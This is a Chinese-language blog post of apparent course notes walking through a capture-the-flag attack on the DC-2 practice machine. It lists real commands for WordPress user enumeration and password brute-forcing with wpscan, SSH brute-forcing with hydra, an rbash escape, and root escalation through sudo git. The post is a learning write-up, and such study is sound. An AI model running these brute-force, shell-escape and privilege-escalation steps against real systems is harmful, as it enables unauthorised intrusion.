[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵

引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!!

 

往期博客:

第一阶段:

[网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记)

[网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118)

第二阶段:

[网络安全学习篇25]:初识Linux及简单命令

[网络安全学习篇32]:Linux脚本编写汇总及应用

第三阶段:

[网络安全学习篇33]:0基础带你入门python

[网络安全学习篇38]:基础环境搭建

[网络安全学习篇39]:HTML标签基础 常用的标签 表格

[网络安全学习篇42]:靶场环境搭建(ubuntu系统安装优化及vulhub安装)

[网络安全学习篇43]:PHP基础+变量 运算符 流程控制语句

[网络安全学习篇48]:JS 基础 函数 事件)

第四阶段:

[网络安全学习篇49]:渗透测试方法论

[网络安全学习篇50]:Web架构安全分析

[网络安全学习篇51]:信息收集

[网络安全学习篇52]:扫描技术

[网络安全学习篇53]:口令破解

[网络安全学习篇54]:SQL注入

[网络安全学习篇55]:SQL自动化注入

[网络安全学习篇56]:XSS

[网络安全学习篇57]:XSS(二)

[网络安全学习篇58]:PHP代码注入

[网络安全学习篇59]:OS命令注入

[网络安全学习篇60]:文件上传

[网络安全学习篇61]:文件包含

[网络安全学习篇62]:CSRF 攻击

[网络安全学习篇63]:SSRF

[网络安全学习篇64]:业务安全

[网络安全学习篇65]:提权

[网络安全学习篇66]:Metasploit(MSF)

[网络安全学习篇67]:python poc-exp

[网络安全学习篇68]:反序列化漏洞

[网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵(本篇)

下期博文:

[网络安全学习篇71]:渗透测试实战-DC-3-靶机入侵

 

目录

DC-2 靶机实战

flag1

flag2

flag3

绕过限制

flag4

final-flag

提权


DC-2 靶机实战

靶机资源:

链接:https://pan.baidu.com/s/1L-fHw8bNAPHS6jHx1BJA3A 
提取码:8r7m

启动DC-2

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第1张图片

 

配置其网络为NAT 查看其Mac 地址,重启DC-2 使其网路配置生效

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第2张图片

 

使用nmap 扫描内网网段

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第3张图片

得到DC-2 的IP地址192.168.1.162

 

对其进行信息收集

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第4张图片

 

访问其IP ,连接失败

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第5张图片

 

 

添加本地DNS解析

vim /etc/hosts

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第6张图片

再访问该网站,成功

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第7张图片

 

flag1

 

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第8张图片

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第9张图片

 

cewl 工具

cewl dc-2 >pwd.dic

网站目录扫描

使用MSF 进行网站目录扫描

use auxiliary/scanner/http/dir_scanner

set RHOSTS 192.168.1.162

set THREADS 50

exploit

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第10张图片

 

wpscan工具

wpscan --update

apt-get install wpscan wpscan   更新

注:如果wpscan 无法使用,可以尝试更换新的kali 虚拟机,笔者就碰到类似的问题,安装 kali 2020.2 之后,wpscan 启动成功

附清华大学开源镜像站kali2020.2(amd64,installer)下载链接

https://mirrors.tuna.tsinghua.edu.cn/kali-images/current/kali-linux-2020.2-installer-amd64.iso

 

wpscan --url dc-2 -e u

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第11张图片

wpscan 爆破用户

wpscan --url dc-2 -U user.dic -P pwd.dic

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第12张图片

 

flag2

192.168.1.162/wp-admin

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第13张图片

使用jerry用户并用我们爆破出来的密码尝试登录

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第14张图片

找到flag2

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第15张图片

他告诉我们需要另辟蹊径,我们想到了刚开始使用nmap 扫描时,还扫出了ssh 端口7744

 

hydra 爆破ssh

hydra -L user.dic -P pwd.dic ssh://192.168.1.162 -s 7744 -o hydra.ssh -vV

查看结果:

 

尝试使用ssh 登录

ssh [email protected] -p 7744

查看当前目录文件

ls

cat flag3.txt

发现有rbash 命令限制

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第16张图片

 

flag3

 

绕过限制

BASH_CMDS[a]=/bin/sh;a

/bin/bash

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第17张图片

 

flag4

 

切换用户

切换jerry用户

su jerry

输入密码,登录成功

我们进入到jerry 用户的家目录

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第18张图片

执行命令,发现没有权限

 

final-flag

 

提权

查看具有root权限的命令

sudo -l

发现git 命令具有root 权限,但是不需要提供给root 密码

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第19张图片

git 提权

sudo git -p --help

强制进入交互式状态,让页面缓冲区无法显示全部信息

!/bin/bash

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵_第20张图片


参考文献:

千峰网络信息安全开源课程

你可能感兴趣的:(渗透测试,千峰网络安全视频笔记篇,靶机实战)